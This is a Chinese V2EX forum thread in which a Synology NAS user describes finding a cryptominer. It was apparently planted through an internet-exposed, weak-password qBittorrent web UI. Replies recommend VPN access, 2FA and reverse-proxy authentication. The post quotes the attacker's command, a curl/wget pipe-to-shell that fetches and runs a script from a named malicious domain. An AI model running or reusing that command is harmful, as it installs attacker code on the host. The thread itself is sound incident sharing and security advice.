记一次群晖开 qbittorrent 被植入挖矿代码

88 天前
 hiyoi
起因:
偶然发现群晖 cpu 内存占用率很高。

查看进程发现有个进程以 qbittornet 用户运行这一个 名叫./PHsyYPRT 进程,名字很古怪,占了 2 核 cpu ,30%内存。

起初怀疑是 qbit 问题,马上停止套件,进程消失。 但是又过了几天,又发现相同的进程。 一顿搜索

参考:
https://www.reddit.com/r/synology/comments/1co3toi/rogue_process_eating_ram/?tl=zh-hans

发现攻击者可以在 web ui, 设置 torrent 下载完成时执行外部程序:
sh -c "(curl -sk https://fulminare.top || wget --no-check-certificate -qO - https://fulminare.top) | sh"

考虑到之前 web ui 曾开到公网过,且用了弱密码。被轻易爆破的可能性很大。

赶紧把 web ui 公网关掉。
3079 次点击
所在节点    NAS
22 条回复
ererrrr
88 天前
要用组网呀
guanzhangzhang
88 天前
异地组成局域网,就没这么多事情了,三层都是通的,而不是映射端口啥的
needhourger
88 天前
弱密码公开到公网啊,那没事了😅
justNoBody
88 天前
谢谢分享
vpsvps
88 天前
qbittorrent 套件源有问题吧
bao3
88 天前
tailscale ,headscale ,wireguard 等等,大家讨论异地组网就是为了家庭服务不用公网公开。
yazinnnn0
88 天前
用 ssh -L 4000:127.0.0.1:4000 之类的办法把端口转发到本机啊... 随便一个应用就放公网太危险了
hiyoi
88 天前
@vpsvps 应该不是,用的矿神群晖 spk 源下的 qbit 套件版,如果有问题应该早就爆出来了
hiyoi
88 天前
再不敢轻易放服务到公网了
JensenQian
88 天前
JensenQian
88 天前
xiaozhubin
87 天前
之前群晖安了个 qb, 也是映射外网了,有次突然发现下载列表里出现了一个我从未下载过的资源,就把外网关了,现在只在内网用了。
hiyoi
87 天前
@xiaozhubin 对公的服务最好是带 2FA 的。我还开着一个 vaultwarden ,开着 2FA ,一直稳定运行。
montaro2017
87 天前
@JensenQian #11 真能搜到啊
okzy520
87 天前
我也是发现 qbit 认证太简单了 就把外网给关了
之后就用 zerotier 了 个人自建的要是不支持 2FA 最好别往外放
pcloves
87 天前
@hiyoi 话说这个 qbit 怎么开 2FA 啊?
anjing01
87 天前
前面加个 APACHE/NGINX ,配置个 BasicAuth 认证+限制国外 IP 访问(甚至只允许你所在省份 IP 访问)+ 访问日志 403 的 IP 地址 ipset 加入 blocklist ,基本上没啥问题(服务器带外需要 WEB 放出来);
WG 也用,不过那个主要是给外部访问 SAMBA 共享、远程桌面用的;
obeykarma
87 天前
我套了 HTTPS 直接对公网,改了用户名和密码

应该没什么安全隐患,最多扫端口发现我在用 qb 了
hiyoi
87 天前
@obeykarma 用强密码就没事
okzy520
86 天前
@pcloves qbit 就没这个能力 别想了
官方论坛上有个帖子解释的 大意什么服务能开放到什么程序是有条件的 用户应该自己评估
不过 qbit 自己的做法已经是在变相告诉你 仅限内网使用了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1137306

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX